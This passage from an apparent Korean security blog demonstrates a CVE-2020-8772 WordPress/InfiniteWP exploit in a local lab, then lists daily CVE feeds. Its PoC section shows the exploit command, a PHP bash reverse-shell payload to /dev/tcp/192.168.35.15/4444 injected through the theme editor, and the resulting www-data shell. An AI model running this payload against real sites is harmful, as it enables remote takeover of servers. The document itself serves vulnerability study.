+or+later%0D%0ALicense+URI%3A+http%3A%2F%2Fwww.gnu.org%2Flicenses%2Fgpl-2.0.html%0D%0AText+Domain%3A+twentyseventeen%0D%
...................................
...................................
...................................
ned+with+others.%0D%0A*%2F%0D%0A%0D%0A%2F*--------------------------------------------------------------%0D%0A%3E%3E%3E+TABLE+OF+CONTENTS%3A%0D%0A------------ant%3B+%2F*+Make+sure+color+schemes+don%27t+affect+to+print+*%2F%0D%0A%09%7D%0D%0A%0D%0A%09h2%2C%0D%0A%09h5%2C%0D%0A%09blockquote%2C%0D%0A%09.site-description%2C%0D%0A%09.twentyseventeen-front-page.has-header-image+.site-description%2C%0D%0A%09.twentyseventeen-front-page.has-header-video+.site-description%2C%0D%0A%09.entry-meta%2C%0D%0A%09.entry-meta+a+%7B%0D%0A%09%09color%3A+%23777+%21important%3B+%2F*+Make+sure+color+schemes+don%27t+affect+to+print+*%2F%0D%0A%09%7D%0D%0A%0D%0A%09.entry-content+blockquote.alignleft%2C%0D%0A%09.entry-content+blockquote.alignright+%7B%0D%0A%09%09font-size%3A+11pt%3B%0D%0A%09%09width%3A+34%25%3B%0D%0A%09%7D%0D%0A%0D%0A%09.site-footer+%7B%0D%0A%09%09padding%3A+0%3B%0D%0A%09%7D%0D%0A%7D%0D%0A&action=update&file=style.css&theme=twentyseventeen&scrollto=400&submit=%ED%8C%8C%EC%9D%BC+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8
  • 워드프레스 관리자 페이지에서 테마를 변경하는 과정을 burpsuite로 잡아보면?
    • _wpnonce 변수를 통해 nonce 값을 전달하고 있음
    • new_content를 통해 새롭게 변경할 테마의 코드를 전달하고 있음
    • action 을 통해서 테마를 update 하겠다고 하고 있음
    • file 을 통해 변경할 파일을 설정하고 있음
    • theme 를 통해서 현재 테마명을 전달하고 있음
    • scrollto 를 통해서 400으로 스크롤 하게 설정하고 있음
    • submit 을 통해서 파일+업데이트를 하겠다고 전달하고 있음

PoC 코드 실행

ncat -lvnp 4444
 python .\\cve-2020-8772.py -u <http://127.0.0.1:8000> -n admin -t twentyseventeen
[DEBUG] baseUrl -  <http://127.0.0.1:8000>
[DEBUG] username -  admin
[DEBUG] themeName -  twentyseventeen
[DEBUG] Payload -  <?php exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.35.15/4444 0>&1'");
[DEBUG] (Make sure to change the payload)

[+] Stage1: IWP Exploit & Sanity Check
[+] Trying <http://127.0.0.1:8000/wp-admin/> with IWP payload : _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==

[+] Stage2: Getting Nonce
[+] Trying <http://127.0.0.1:8000/wp-admin/theme-editor.php>
[+] Trying <http://127.0.0.1:8000/wp-admin/theme-editor.php?file=archive.php&theme=twentyseventeen>
[DEBUG] Nonce =  1cfc1aea53

[+] Stage3: Injecting Payload into archive.php
[+] Trying <http://127.0.0.1:8000/wp-admin/theme-editor.php>
[+] Full Payload :  {'_wpnonce': '1cfc1aea53', 'newcontent': '<?php exec("/bin/bash -c \\'bash -i > /dev/tcp/192.168.35.15/4444 0>&1\\'");', 'action': 'update', 'file': 'archive.php', 'theme': 'twentyseventeen', 'scrollto': '0', 'docs-list': '', 'submit': 'Update File'}

[+] Exploitation Successful. Open up netcat listener & Visit the following URL

[+] Visit -->  <http://127.0.0.1:8000/wp-content/themes/twentyseventeen/archive.php>
 ncat -lvnp 4444
Ncat: Version 7.94 ( <https://nmap.org/ncat> )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.35.15:13159.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

반응형
반응형
datetime subject id link
2023-10-19 00:05:02.369554 (Remote Attack, PHP, XSS) CVE-2023-5631 https://cve.report/CVE-2023-5631
2023-10-19 00:05:02.430424 (XSS) CVE-2023-30781 https://cve.report/CVE-2023-30781
2023-10-19 00:05:02.443731 (XSS) CVE-2023-45632 https://cve.report/CVE-2023-45632
2023-10-19 00:05:02.457371 (XSS) CVE-2023-45630 https://cve.report/CVE-2023-45630
2023-10-19 00:05:02.470955 (XSS) CVE-2023-45628 https://cve.report/CVE-2023-45628
2023-10-19 00:05:02.534317 (WordPress, XSS) CVE-2023-45607 https://cve.report/CVE-2023-45607
2023-10-19 00:05:02.547502 (XSS) CVE-2023-45604 https://cve.report/CVE-2023-45604
2023-10-19 00:05:02.560528 (XSS) CVE-2023-45602 https://cve.report/CVE-2023-45602
2023-10-19 02:05:02.930560 (Remote Attack) CVE-2023-20261 https://cve.report/CVE-2023-20261
2023-10-19 02:05:02.944207 (Path Traversal) CVE-2023-45383 https://cve.report/CVE-2023-45383
2023-10-19 02:05:02.959747 (Remote Attack) CVE-2023-5642 https://cve.report/CVE-2023-5642
2023-10-19 07:05:02.381506 (redis) CVE-2023-45145 https://cve.report/CVE-2023-45145
2023-10-19 08:05:02.624003 (File Upload) CVE-2023-37502 https://cve.report/CVE-2023-37502
2023-10-19 08:05:02.637253 (PHP, XSS) CVE-2023-45958 https://cve.report/CVE-2023-45958
2023-10-19 08:05:02.650865 (Remote Code Execution, Execute Arbitrary code) CVE-2023-45146 https://cve.report/CVE-2023-45146
2023-10-19 12:05:02.585574 (WordPress) CVE-2023-4645 https://cve.report/CVE-2023-4645
2023-10-19 16:05:02.848190 (WordPress, PHP, Critical) CVE-2023-5241 https://cve.report/CVE-2023-5241
2023-10-19 18:05:02.988422 (GitHub) CVE-2023-25753 https://cve.report/CVE-2023-25753
2023-10-19 20:05:02.052134 (GitHub) CVE-2023-46227 https://cve.report/CVE-2023-46227
2023-10-19 22:05:02.266043 (XSS) CVE-2022-37830 https://cve.report/CVE-2022-37830
2023-10-19 23:05:02.976948 (PHP) CVE-2023-45384 https://cve.report/CVE-2023-45384
2023-10-19 23:05:03.029931 (SQL injection) CVE-2023-45379 https://cve.report/CVE-2023-45379
반응형
반응형
datetime subject id link
2023-10-18 00:05:03.378890 (Execute Arbitrary code) CVE-2023-43959 https://cve.report/CVE-2023-43959
2023-10-18 06:05:02.425570 (PHP, File Upload, Execute Arbitrary code) CVE-2023-45952 https://cve.report/CVE-2023-45952
2023-10-18 06:05:02.438759 (PHP, SQL injection) CVE-2023-45951 https://cve.report/CVE-2023-45951
2023-10-18 07:05:02.762932 (Path Traversal) CVE-2023-41629 https://cve.report/CVE-2023-41629
2023-10-18 07:05:02.825968 (SQL injection) CVE-2023-43794 https://cve.report/CVE-2023-43794
2023-10-18 08:05:02.564205 (MySQL, SQL Server, SQL Server) CVE-2023-22070 https://cve.report/CVE-2023-22070
2023-10-18 08:05:02.626612 (MySQL, SQL Server, SQL Server) CVE-2023-22068 https://cve.report/CVE-2023-22068
2023-10-18 08:05:02.640127 (MySQL, SQL Server, SQL Server) CVE-2023-22066 https://cve.report/CVE-2023-22066
2023-10-18 08:05:02.653633 (MySQL, SQL Server, SQL Server) CVE-2023-22065 https://cve.report/CVE-2023-22065
2023-10-18 08:05:02.666805 (MySQL, SQL Server, SQL Server) CVE-2023-22064 https://cve.report/CVE-2023-22064
2023-10-18 08:05:02.734239 (MySQL, SQL Server, SQL Server) CVE-2023-22059 https://cve.report/CVE-2023-22059
2023-10-18 08:05:02.753353 (MySQL, SQL Server, SQL Server) CVE-2023-22032 https://cve.report/CVE-2023-22032
2023-10-18 08:05:02.766778 (MySQL, SQL Server, SQL Server) CVE-2023-22028 https://cve.report/CVE-2023-22028
2023-10-18 08:05:02.824703 (MySQL, SQL Server, SQL Server) CVE-2023-22026 https://cve.report/CVE-2023-22026
2023-10-18 08:05:02.842649 (Critical) CVE-2023-22019 https://cve.report/CVE-2023-22019
2023-10-18 08:05:02.859249 (MySQL, SQL Server, SQL Server) CVE-2023-22015 https://cve.report/CVE-2023-22015
2023-10-18 08:05:02.872881 (Remote Code Execution, File Upload) CVE-2023-41631 https://cve.report/CVE-2023-41631
2023-10-18 08:05:02.930966 (Remote Code Execution) CVE-2023-41630 https://cve.report/CVE-2023-41630
2023-10-18 09:05:03.224236 (MySQL, SQL Server, SQL Server) CVE-2023-22092 https://cve.report/CVE-2023-22092
2023-10-18 09:05:03.238033 (Critical) CVE-2023-22090 https://cve.report/CVE-2023-22090
2023-10-18 09:05:03.253525 (Critical) CVE-2023-22086 https://cve.report/CVE-2023-22086
2023-10-18 09:05:03.266802 (MySQL, SQL Server, SQL Server) CVE-2023-22084 https://cve.report/CVE-2023-22084
2023-10-18 09:05:03.333603 (MySQL, SQL Server, SQL Server) CVE-2023-22079 https://cve.report/CVE-2023-22079
2023-10-18 09:05:03.348089 (MySQL, SQL Server, SQL Server) CVE-2023-22078 https://cve.report/CVE-2023-22078
2023-10-18 10:05:03.026822 (MySQL, SQL Server, SQL Server) CVE-2023-22113 https://cve.report/CVE-2023-22113
2023-10-18 10:05:03.050065 (MySQL, SQL Server, SQL Server) CVE-2023-22112 https://cve.report/CVE-2023-22112
2023-10-18 10:05:03.067647 (MySQL, SQL Server, SQL Server) CVE-2023-22111 https://cve.report/CVE-2023-22111
2023-10-18 10:05:03.126402 (MySQL, SQL Server, SQL Server) CVE-2023-22110 https://cve.report/CVE-2023-22110
2023-10-18 10:05:03.144247 (Critical) CVE-2023-22108 https://cve.report/CVE-2023-22108
2023-10-18 10:05:03.161312 (Critical) CVE-2023-22106 https://cve.report/CVE-2023-22106
2023-10-18 10:05:03.177172 (MySQL, SQL Server, SQL Server) CVE-2023-22104 https://cve.report/CVE-2023-22104
2023-10-18 10:05:03.233245 (MySQL, SQL Server, SQL Server) CVE-2023-22103 https://cve.report/CVE-2023-22103
2023-10-18 10:05:03.246451 (MySQL) CVE-2023-22102 https://cve.report/CVE-2023-22102
2023-10-18 10:05:03.259600 (Critical) CVE-2023-22100 https://cve.report/CVE-2023-22100
2023-10-18 10:05:03.272810 (MySQL, SQL Server, SQL Server) CVE-2023-22097 https://cve.report/CVE-2023-22097
2023-10-18 10:05:03.334395 (MySQL, SQL Server, SQL Server) CVE-2023-22095 https://cve.report/CVE-2023-22095
2023-10-18 10:05:03.347464 (MySQL, SQL Server, Critical, SQL Server) CVE-2023-22094 https://cve.report/CVE-2023-22094
2023-10-18 11:05:02.279292 (GitHub, XSS) CVE-2023-3042 https://cve.report/CVE-2023-3042
2023-10-18 11:05:02.335243 (Critical) CVE-2023-22122 https://cve.report/CVE-2023-22122
2023-10-18 11:05:02.349376 (Critical) CVE-2023-22119 https://cve.report/CVE-2023-22119
2023-10-18 11:05:02.363217 (MySQL, SQL Server, SQL Server) CVE-2023-22115 https://cve.report/CVE-2023-22115
2023-10-18 11:05:02.427544 (MySQL, SQL Server, SQL Server) CVE-2023-22114 https://cve.report/CVE-2023-22114
2023-10-18 14:05:07.282531 (Grafana) CVE-2023-4822 https://cve.report/CVE-2023-4822
2023-10-18 15:05:02.376789 (Remote Attack, GraphQL) CVE-2023-42319 https://cve.report/CVE-2023-42319
2023-10-18 15:05:02.433429 (GitHub) CVE-2023-5626 https://cve.report/CVE-2023-5626
2023-10-18 18:05:02.374319 (XSS) CVE-2023-45049 https://cve.report/CVE-2023-45049
2023-10-18 18:05:02.435102 (XSS) CVE-2023-45008 https://cve.report/CVE-2023-45008
2023-10-18 18:05:02.453016 (XSS) CVE-2023-25476 https://cve.report/CVE-2023-25476
2023-10-18 18:05:02.468077 (WordPress) CVE-2023-4938 https://cve.report/CVE-2023-4938
2023-10-18 19:05:02.853413 (XSS) CVE-2023-45064 https://cve.report/CVE-2023-45064
2023-10-18 19:05:02.866717 (XSS) CVE-2023-45062 https://cve.report/CVE-2023-45062
2023-10-18 19:05:02.927849 (XSS) CVE-2023-45059 https://cve.report/CVE-2023-45059
2023-10-18 19:05:02.940687 (XSS) CVE-2023-45057 https://cve.report/CVE-2023-45057
2023-10-18 19:05:02.953790 (XSS) CVE-2023-45056 https://cve.report/CVE-2023-45056
2023-10-18 19:05:02.966891 (XSS) CVE-2023-45054 https://cve.report/CVE-2023-45054
2023-10-18 19:05:03.030561 (XSS) CVE-2023-45051 https://cve.report/CVE-2023-45051
2023-10-18 20:05:02.177103 (XXE) CVE-2023-45727 https://cve.report/CVE-2023-45727
2023-10-18 22:05:03.007197 (XSS) CVE-2023-32089 https://cve.report/CVE-2023-32089
2023-10-18 22:05:03.046960 (XSS) CVE-2023-32088 https://cve.report/CVE-2023-32088
2023-10-18 22:05:03.066512 (XSS) CVE-2023-32087 https://cve.report/CVE-2023-32087
2023-10-18 23:05:02.268586 (XSS) CVE-2023-45608 https://cve.report/CVE-2023-45608
2023-10-18 23:05:02.330239 (XSS) CVE-2023-45073 https://cve.report/CVE-2023-45073
2023-10-18 23:05:02.344664 (XSS) CVE-2023-45072 https://cve.report/CVE-2023-45072
2023-10-18 23:05:02.357681 (XSS) CVE-2023-45071 https://cve.report/CVE-2023-45071
2023-10-18 23:05:02.370407 (XSS) CVE-2023-45070 https://cve.report/CVE-2023-45070
2023-10-18 23:05:02.433984 (WordPress, XSS) CVE-2023-45067 https://cve.report/CVE-2023-45067
2023-10-18 23:05:02.450777 (XSS) CVE-2023-45065 https://cve.report/CVE-2023-45065
2023-10-18 23:05:02.463679 (XSS) CVE-2023-31217 https://cve.report/CVE-2023-31217
반응형
반응형
datetime subject id link
2023-10-17 01:05:03.688204 (Cisco IOS) CVE-2023-20198 https://cve.report/CVE-2023-20198
2023-10-17 03:05:02.751282 (Path Traversal) CVE-2023-45689 https://cve.report/CVE-2023-45689
2023-10-17 03:05:02.764314 (Path Traversal) CVE-2023-45688 https://cve.report/CVE-2023-45688
2023-10-17 03:05:02.826215 (Path Traversal) CVE-2023-45686 https://cve.report/CVE-2023-45686
2023-10-17 03:05:02.838895 (Path Traversal) CVE-2023-45685 https://cve.report/CVE-2023-45685
2023-10-17 05:05:02.962247 (GraphQL) CVE-2023-40180 https://cve.report/CVE-2023-40180
2023-10-17 05:05:02.979678 (GitHub, XSS) CVE-2023-45683 https://cve.report/CVE-2023-45683
2023-10-17 05:05:03.036032 (Spring Security) CVE-2023-45669 https://cve.report/CVE-2023-45669
2023-10-17 05:05:03.055329 (redis, memcached) CVE-2023-45148 https://cve.report/CVE-2023-45148
2023-10-17 07:05:03.474322 (redis) CVE-2023-43119 https://cve.report/CVE-2023-43119
2023-10-17 08:05:04.174349 (Remote Attack) CVE-2023-45542 https://cve.report/CVE-2023-45542
2023-10-17 08:05:04.234208 (Remote Code Execution, XSS) CVE-2023-45144 https://cve.report/CVE-2023-45144
2023-10-17 08:05:04.248093 (PHP, SQL injection) CVE-2023-40852 https://cve.report/CVE-2023-40852
2023-10-17 08:05:04.261946 (PHP, XSS) CVE-2023-40851 https://cve.report/CVE-2023-40851
2023-10-17 10:05:03.271864 (Remote Attack) CVE-2022-22377 https://cve.report/CVE-2022-22377
2023-10-17 10:05:03.329291 (Kibana, ElasticSearch, OpenSearch) CVE-2023-45807 https://cve.report/CVE-2023-45807
2023-10-17 10:05:03.349374 (Remote Attack) CVE-2023-45540 https://cve.report/CVE-2023-45540
2023-10-17 10:05:03.362780 (PHP) CVE-2023-44394 https://cve.report/CVE-2023-44394
2023-10-17 10:05:03.377043 (nginx) CVE-2023-44388 https://cve.report/CVE-2023-44388
2023-10-17 10:05:03.435670 (XSS) CVE-2023-43658 https://cve.report/CVE-2023-43658
2023-10-17 11:05:03.441641 (Arbitrary Command) CVE-2022-22375 https://cve.report/CVE-2022-22375
2023-10-17 12:05:02.490172 (Remote Attack) CVE-2022-22386 https://cve.report/CVE-2022-22386
2023-10-17 13:05:02.929240 (Remote Attack) CVE-2022-43891 https://cve.report/CVE-2022-43891
2023-10-17 14:05:02.761925 (Path Traversal) CVE-2023-34208 https://cve.report/CVE-2023-34208
2023-10-17 15:05:03.665566 (PHP, SQL injection) CVE-2023-44693 https://cve.report/CVE-2023-44693
2023-10-17 15:05:03.727697 (SQL injection) CVE-2023-45386 https://cve.report/CVE-2023-45386
2023-10-17 15:05:03.740670 (SQL injection) CVE-2023-45375 https://cve.report/CVE-2023-45375
2023-10-17 15:05:03.753538 (XSS) CVE-2023-45358 https://cve.report/CVE-2023-45358
2023-10-17 15:05:03.766660 (SQL injection) CVE-2023-34210 https://cve.report/CVE-2023-34210
2023-10-17 16:05:03.671309 (PHP, SQL injection) CVE-2023-44694 https://cve.report/CVE-2023-44694
2023-10-17 17:05:03.776232 (Remote Attack) CVE-2023-4089 https://cve.report/CVE-2023-4089
2023-10-17 18:05:03.035111 (XSS) CVE-2023-24385 https://cve.report/CVE-2023-24385
2023-10-17 18:05:03.054871 (Remote Attack, XSS) CVE-2023-42497 https://cve.report/CVE-2023-42497
2023-10-17 18:05:03.070022 (Grafana) CVE-2023-4399 https://cve.report/CVE-2023-4399
2023-10-17 19:05:02.564705 (Remote Attack, XSS) CVE-2023-44310 https://cve.report/CVE-2023-44310
2023-10-17 19:05:02.627373 (Remote Attack, XSS) CVE-2023-44309 https://cve.report/CVE-2023-44309
2023-10-17 19:05:02.653671 (Remote Attack, XSS) CVE-2023-42629 https://cve.report/CVE-2023-42629
2023-10-17 20:05:02.530875 (XSS) CVE-2023-45005 https://cve.report/CVE-2023-45005
2023-10-17 20:05:02.549641 (WordPress, XSS) CVE-2023-44990 https://cve.report/CVE-2023-44990
2023-10-17 20:05:02.565540 (Remote Attack, XSS) CVE-2023-44311 https://cve.report/CVE-2023-44311
2023-10-17 21:05:03.662319 (XSS) CVE-2023-45010 https://cve.report/CVE-2023-45010
2023-10-17 21:05:03.679348 (XSS) CVE-2023-45003 https://cve.report/CVE-2023-45003
2023-10-17 22:05:02.865791 (Remote Attack, XSS) CVE-2023-42627 https://cve.report/CVE-2023-42627
2023-10-17 22:05:02.927111 (XSS) CVE-2023-45007 https://cve.report/CVE-2023-45007
2023-10-17 22:05:02.940078 (XSS) CVE-2023-45006 https://cve.report/CVE-2023-45006
2023-10-17 22:05:02.952822 (XSS) CVE-2023-45004 https://cve.report/CVE-2023-45004
2023-10-17 22:05:02.965618 (Remote Attack, XSS) CVE-2023-42628 https://cve.report/CVE-2023-42628
2023-10-17 23:05:02.670337 (PHP, File Upload, Execute Arbitrary code) CVE-2023-44824 https://cve.report/CVE-2023-44824
반응형
반응형
datetime subject id link
2023-10-16 08:05:02.855311 (Path Traversal) CVE-2023-5588 https://cve.report/CVE-2023-5588
2023-10-16 09:05:02.965428 (Remote Attack, XSS) CVE-2022-48612 https://cve.report/CVE-2022-48612
2023-10-16 09:05:03.028933 (GitHub) CVE-2023-5590 https://cve.report/CVE-2023-5590
2023-10-16 11:05:02.673854 (GitHub, SQL injection) CVE-2023-5591 https://cve.report/CVE-2023-5591
2023-10-16 16:05:02.477038 (Command Injection, Remote Code Execution) CVE-2023-21413 https://cve.report/CVE-2023-21413
2023-10-16 16:05:02.528606 (Remote Attack, Execute Arbitrary code) CVE-2023-45575 https://cve.report/CVE-2023-45575
2023-10-16 16:05:02.547090 (Remote Attack, Execute Arbitrary code) CVE-2023-45574 https://cve.report/CVE-2023-45574
2023-10-16 16:05:02.562597 (Remote Attack, Execute Arbitrary code) CVE-2023-45573 https://cve.report/CVE-2023-45573
2023-10-16 16:05:02.575855 (Remote Attack, Execute Arbitrary code) CVE-2023-45572 https://cve.report/CVE-2023-45572
2023-10-16 16:05:02.633264 (Command Injection) CVE-2023-36954 https://cve.report/CVE-2023-36954
2023-10-16 16:05:02.646384 (Command Injection) CVE-2023-36953 https://cve.report/CVE-2023-36953
2023-10-16 17:05:03.661926 (Command Injection) CVE-2023-45158 https://cve.report/CVE-2023-45158
2023-10-16 17:05:03.725513 (Remote Attack, Execute Arbitrary code) CVE-2023-45580 https://cve.report/CVE-2023-45580
2023-10-16 17:05:03.738342 (Remote Attack, Execute Arbitrary code) CVE-2023-45579 https://cve.report/CVE-2023-45579
2023-10-16 17:05:03.750847 (Remote Attack, Execute Arbitrary code) CVE-2023-45578 https://cve.report/CVE-2023-45578
2023-10-16 17:05:03.763266 (Remote Attack, Execute Arbitrary code) CVE-2023-45577 https://cve.report/CVE-2023-45577
2023-10-16 17:05:03.826645 (Remote Attack, Execute Arbitrary code) CVE-2023-45576 https://cve.report/CVE-2023-45576
2023-10-16 17:05:03.839137 (Path Traversal) CVE-2023-21415 https://cve.report/CVE-2023-21415
2023-10-16 19:05:02.626868 (GitHub, SQL injection) CVE-2023-43667 https://cve.report/CVE-2023-43667
2023-10-16 19:05:02.640837 (GitHub) CVE-2023-43666 https://cve.report/CVE-2023-43666
2023-10-16 19:05:02.655234 (GitHub) CVE-2023-5595 https://cve.report/CVE-2023-5595
2023-10-16 19:05:02.668780 (OpenSSL) CVE-2023-5422 https://cve.report/CVE-2023-5422
2023-10-16 19:05:02.728962 (GitHub, XSS) CVE-2023-45757 https://cve.report/CVE-2023-45757
2023-10-16 19:05:02.743374 (Critical) CVE-2023-4834 https://cve.report/CVE-2023-4834
2023-10-16 20:05:02.847111 (GitHub) CVE-2023-43668 https://cve.report/CVE-2023-43668
2023-10-16 21:05:03.274378 (XSS) CVE-2023-44987 https://cve.report/CVE-2023-44987
2023-10-16 21:05:03.338767 (XSS) CVE-2023-44986 https://cve.report/CVE-2023-44986
2023-10-16 21:05:03.353271 (XSS) CVE-2023-44985 https://cve.report/CVE-2023-44985
2023-10-16 21:05:03.366353 (XSS) CVE-2023-44984 https://cve.report/CVE-2023-44984
2023-10-16 21:05:03.425440 (XSS) CVE-2023-44229 https://cve.report/CVE-2023-44229
2023-10-16 22:05:03.168147 (Grafana) CVE-2023-4457 https://cve.report/CVE-2023-4457
2023-10-16 22:05:03.228669 (Command Injection, Command Execution, Arbitrary Command) CVE-2023-3991 https://cve.report/CVE-2023-3991
2023-10-16 22:05:03.242429 (XSS) CVE-2023-46066 https://cve.report/CVE-2023-46066
반응형
반응형
datetime subject id link
2023-10-15 01:05:02.651027 (Remote Attack) CVE-2022-33165 https://cve.report/CVE-2022-33165
2023-10-15 01:05:02.666482 (Remote Attack) CVE-2022-33161 https://cve.report/CVE-2022-33161
2023-10-15 01:05:02.679222 (Remote Attack, XXE) CVE-2022-32755 https://cve.report/CVE-2022-32755
2023-10-15 02:05:02.742148 (IBM QRadar) CVE-2023-30994 https://cve.report/CVE-2023-30994
2023-10-15 03:05:02.181191 (IBM QRadar) CVE-2023-40367 https://cve.report/CVE-2023-40367
2023-10-15 11:05:03.671589 (GitHub) CVE-2023-5586 https://cve.report/CVE-2023-5586
반응형
반응형
datetime subject id link
2023-10-14 00:05:03.375535 (XSS) CVE-2023-45391 https://cve.report/CVE-2023-45391
2023-10-14 01:05:03.525285 (Path Traversal) CVE-2023-41682 https://cve.report/CVE-2023-41682
2023-10-14 06:05:03.048451 (XSS) CVE-2023-34977 https://cve.report/CVE-2023-34977
2023-10-14 06:05:03.063162 (SQL injection) CVE-2023-34976 https://cve.report/CVE-2023-34976
2023-10-14 06:05:03.131077 (SQL injection) CVE-2023-34975 https://cve.report/CVE-2023-34975
2023-10-14 06:05:03.150224 (Command Injection) CVE-2023-32976 https://cve.report/CVE-2023-32976
2023-10-14 06:05:03.168753 (Path Traversal) CVE-2023-32974 https://cve.report/CVE-2023-32974
2023-10-14 09:05:03.449922 (SQL injection) CVE-2023-45674 https://cve.report/CVE-2023-45674
2023-10-14 12:05:03.069246 (Arbitrary Command) CVE-2023-45852 https://cve.report/CVE-2023-45852
2023-10-14 13:05:02.356897 (PHP, XSS) CVE-2023-30148 https://cve.report/CVE-2023-30148
2023-10-14 14:05:02.867539 (Remote Attack, PHP, SQL injection) CVE-2023-30154 https://cve.report/CVE-2023-30154
2023-10-14 15:05:02.366346 (Command Injection, Command Execution) CVE-2023-26155 https://cve.report/CVE-2023-26155
2023-10-14 15:05:02.429813 (Remote Code Execution, PHP) CVE-2023-45856 https://cve.report/CVE-2023-45856
2023-10-14 15:05:02.455109 (Remote Attack) CVE-2023-44037 https://cve.report/CVE-2023-44037
2023-10-14 18:05:05.156211 (Path Traversal) CVE-2023-39332 https://cve.report/CVE-2023-39332
2023-10-14 18:05:05.169522 (Path Traversal) CVE-2023-39331 https://cve.report/CVE-2023-39331
2023-10-14 20:05:07.663803 (PHP) CVE-2023-5578 https://cve.report/CVE-2023-5578
반응형
반응형
datetime subject id link
2023-10-13 02:05:02.526259 (PHP) CVE-2023-43147 https://cve.report/CVE-2023-43147
2023-10-13 03:05:02.642400 (Remote Code Execution, Critical) CVE-2023-45138 https://cve.report/CVE-2023-45138
2023-10-13 04:05:03.462388 (Vmware) CVE-2023-27312 https://cve.report/CVE-2023-27312
2023-10-13 04:05:03.475311 (Remote Attack) CVE-2023-43149 https://cve.report/CVE-2023-43149
2023-10-13 05:05:02.784532 (Remote Attack) CVE-2023-43148 https://cve.report/CVE-2023-43148
2023-10-13 09:05:02.569968 (SQL injection) CVE-2023-41262 https://cve.report/CVE-2023-41262
2023-10-13 10:05:03.056309 (Critical) CVE-2023-44201 https://cve.report/CVE-2023-44201
2023-10-13 11:05:03.141152 (GitHub, XSS) CVE-2023-5564 https://cve.report/CVE-2023-5564
2023-10-13 17:05:02.565096 (SQL injection) CVE-2023-38250 https://cve.report/CVE-2023-38250
2023-10-13 17:05:02.578025 (SQL injection) CVE-2023-38249 https://cve.report/CVE-2023-38249
2023-10-13 17:05:02.630831 (SQL injection) CVE-2023-38221 https://cve.report/CVE-2023-38221
2023-10-13 17:05:02.644416 (XSS) CVE-2023-38219 https://cve.report/CVE-2023-38219
2023-10-13 19:05:03.559878 (GitHub) CVE-2023-5572 https://cve.report/CVE-2023-5572
2023-10-13 19:05:03.577169 (GitHub) CVE-2023-5571 https://cve.report/CVE-2023-5571
2023-10-13 20:05:02.352921 (WordPress, XSS) CVE-2023-38000 https://cve.report/CVE-2023-38000
2023-10-13 20:05:02.365880 (GitHub) CVE-2023-5573 https://cve.report/CVE-2023-5573
2023-10-13 21:05:02.567791 (WordPress) CVE-2023-39999 https://cve.report/CVE-2023-39999
2023-10-13 22:05:04.236063 (Execute Arbitrary code) CVE-2023-43079 https://cve.report/CVE-2023-43079
2023-10-13 23:05:02.789786 (Command Injection) CVE-2023-45467 https://cve.report/CVE-2023-45467
2023-10-13 23:05:02.836410 (Command Injection) CVE-2023-45466 https://cve.report/CVE-2023-45466
2023-10-13 23:05:02.864851 (Command Injection) CVE-2023-45465 https://cve.report/CVE-2023-45465
2023-10-13 23:05:02.878080 (SQL injection) CVE-2023-45162 https://cve.report/CVE-2023-45162
2023-10-13 23:05:02.931238 (GitHub, XSS) CVE-2023-4829 https://cve.report/CVE-2023-4829
2023-10-13 23:05:02.952286 (GitHub, XSS) CVE-2023-4517 https://cve.report/CVE-2023-4517
반응형
반응형
datetime subject id link
2023-10-12 01:05:02.559758 (Command Injection, Command Execution) CVE-2023-28381 https://cve.report/CVE-2023-28381
2023-10-12 02:05:02.326996 (Command Injection, Command Execution) CVE-2023-35194 https://cve.report/CVE-2023-35194
2023-10-12 02:05:02.346089 (Command Injection, Command Execution) CVE-2023-35193 https://cve.report/CVE-2023-35193
2023-10-12 02:05:02.364682 (Command Execution) CVE-2023-35056 https://cve.report/CVE-2023-35056
2023-10-12 02:05:02.380414 (Command Execution) CVE-2023-35055 https://cve.report/CVE-2023-35055
2023-10-12 02:05:02.439888 (Command Injection, Command Execution) CVE-2023-34356 https://cve.report/CVE-2023-34356
2023-10-12 02:05:02.456414 (XSS) CVE-2023-34354 https://cve.report/CVE-2023-34354
2023-10-12 02:05:02.469595 (Command Execution) CVE-2023-32632 https://cve.report/CVE-2023-32632
2023-10-12 02:05:02.526106 (Command Injection, Command Execution) CVE-2023-27380 https://cve.report/CVE-2023-27380
2023-10-12 02:05:02.540666 (Command Execution, Arbitrary Command) CVE-2023-24479 https://cve.report/CVE-2023-24479
2023-10-12 02:05:02.554867 (Command Execution) CVE-2023-34346 https://cve.report/CVE-2023-34346
2023-10-12 04:05:02.761485 (Remote Attack) CVE-2023-43960 https://cve.report/CVE-2023-43960
2023-10-12 05:05:02.972315 (Remote Attack, File Upload) CVE-2023-44962 https://cve.report/CVE-2023-44962
2023-10-12 05:05:03.030735 (Remote Attack, SQL injection) CVE-2023-44961 https://cve.report/CVE-2023-44961
2023-10-12 06:05:02.965774 (GitHub) CVE-2023-5535 https://cve.report/CVE-2023-5535
2023-10-12 06:05:03.029817 (Remote Code Execution) CVE-2023-35662 https://cve.report/CVE-2023-35662
2023-10-12 06:05:03.043982 (Remote Code Execution) CVE-2023-35649 https://cve.report/CVE-2023-35649
2023-10-12 06:05:03.058169 (Remote Code Execution) CVE-2023-35646 https://cve.report/CVE-2023-35646
2023-10-12 07:05:03.848874 (nginx) CVE-2023-45132 https://cve.report/CVE-2023-45132
2023-10-12 09:05:04.963895 (Remote Attack) CVE-2023-5486 https://cve.report/CVE-2023-5486
2023-10-12 09:05:05.026948 (Remote Attack) CVE-2023-5485 https://cve.report/CVE-2023-5485
2023-10-12 09:05:05.039819 (Remote Attack) CVE-2023-5484 https://cve.report/CVE-2023-5484
2023-10-12 09:05:05.052438 (Remote Attack) CVE-2023-5483 https://cve.report/CVE-2023-5483
2023-10-12 09:05:05.064841 (Remote Attack) CVE-2023-5481 https://cve.report/CVE-2023-5481
2023-10-12 09:05:05.129018 (Remote Attack) CVE-2023-5478 https://cve.report/CVE-2023-5478
2023-10-12 09:05:05.146032 (Remote Attack) CVE-2023-5476 https://cve.report/CVE-2023-5476
2023-10-12 09:05:05.160003 (Remote Attack) CVE-2023-5474 https://cve.report/CVE-2023-5474
2023-10-12 09:05:05.172404 (Remote Attack) CVE-2023-5473 https://cve.report/CVE-2023-5473
2023-10-12 09:05:05.232140 (Remote Attack, Critical) CVE-2023-5218 https://cve.report/CVE-2023-5218
